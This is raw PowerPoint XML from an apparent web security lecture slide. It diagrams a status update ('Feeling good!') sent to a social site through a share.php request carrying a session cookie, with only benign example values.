              <a:rPr sz="2400" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>status:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3700272" y="2022162"/>
            <a:ext cx="2192867" cy="410369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="40640" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="121917">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Feeling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>good!</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6018954" y="2006583"/>
            <a:ext cx="1247140" cy="411222"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BEBEBE"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="41485" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="273465">
              <a:spcBef>
                <a:spcPts val="325"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Share</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1816607" y="2084663"/>
            <a:ext cx="4236720" cy="1264920"/>
            <a:chOff x="1362455" y="1563497"/>
            <a:chExt cx="3177540" cy="948690"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="object 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1375155" y="1576197"/>
              <a:ext cx="1093470" cy="732790"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1093470" h="732789">
                  <a:moveTo>
                    <a:pt x="670560" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="727710" y="154050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="424179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114300" y="732282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842010" y="462152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899287" y="616203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092962" y="193801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="670560" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4F81BC"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="object 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1375155" y="1576197"/>
              <a:ext cx="1093470" cy="732790"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1093470" h="732789">
                  <a:moveTo>
                    <a:pt x="0" y="424179"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="727710" y="154050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="670560" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092962" y="193801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899287" y="616203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842010" y="462152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114300" y="732282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="424179"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="385D89"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="object 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2705988" y="2137651"/>
              <a:ext cx="1828800" cy="369570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1828800" h="369569">
                  <a:moveTo>
                    <a:pt x="1828800" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828800" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828800" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="object 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2705988" y="2137651"/>
              <a:ext cx="1828800" cy="369570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1828800" h="369569">
                  <a:moveTo>
                    <a:pt x="0" y="369328"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1828800" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828800" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="369328"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3614335" y="2874940"/>
            <a:ext cx="2425700" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="242987">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Displays</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3335867" y="3635756"/>
            <a:ext cx="5215467" cy="944880"/>
            <a:chOff x="2501900" y="2726817"/>
            <a:chExt cx="3911600" cy="708660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514600" y="2739517"/>
              <a:ext cx="3886200" cy="683260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="683260">
                  <a:moveTo>
                    <a:pt x="3886200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="682878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627754" y="682878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="object 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6142354" y="3163951"/>
              <a:ext cx="258445" cy="258445"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="258445" h="258445">
                  <a:moveTo>
                    <a:pt x="258445" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="51689" y="51688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="258444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258445" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CDCDCD"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="object 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514600" y="2739517"/>
              <a:ext cx="3886200" cy="683260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="683260">
                  <a:moveTo>
                    <a:pt x="3627754" y="682878"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3679444" y="476122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627754" y="682878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="682878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424433"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4820920" y="3651672"/>
            <a:ext cx="2241973" cy="509541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773" indent="552013">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>share.php </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>text=Feeling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Good!</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4173253"/>
            <a:ext cx="2413000" cy="45212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657600" y="4173254"/>
            <a:ext cx="2413000" cy="361574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33020" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320031">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>On</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“Share”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>click</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6019800" y="4218585"/>
            <a:ext cx="2413000" cy="1490980"/>
            <a:chOff x="4514850" y="3163938"/>
            <a:chExt cx="1809750" cy="1118235"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="object 37"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4876800" y="3163938"/>
              <a:ext cx="1041895" cy="804557"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="object 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4514850" y="3943349"/>
              <a:ext cx="1809750" cy="339090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1809750" h="339089">
                  <a:moveTo>
                    <a:pt x="1809750" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="338556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809750" y="338556"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809750" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="object 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="5257801"/>
            <a:ext cx="2413000" cy="361574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33020" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="393690">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Session Cookie</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="object 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8945879" y="6070735"/>
            <a:ext cx="2648373" cy="312073"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>ww</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-167" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>acebook.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>om</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11384619" y="6663774"/>
            <a:ext cx="723053" cy="166712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="1273"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Da</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>wn</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>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3679</TotalTime>
  <Words>9037</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1434</Paragraphs>
  <Slides>119</Slides>
  <Notes>96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119</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="133" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial MT</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
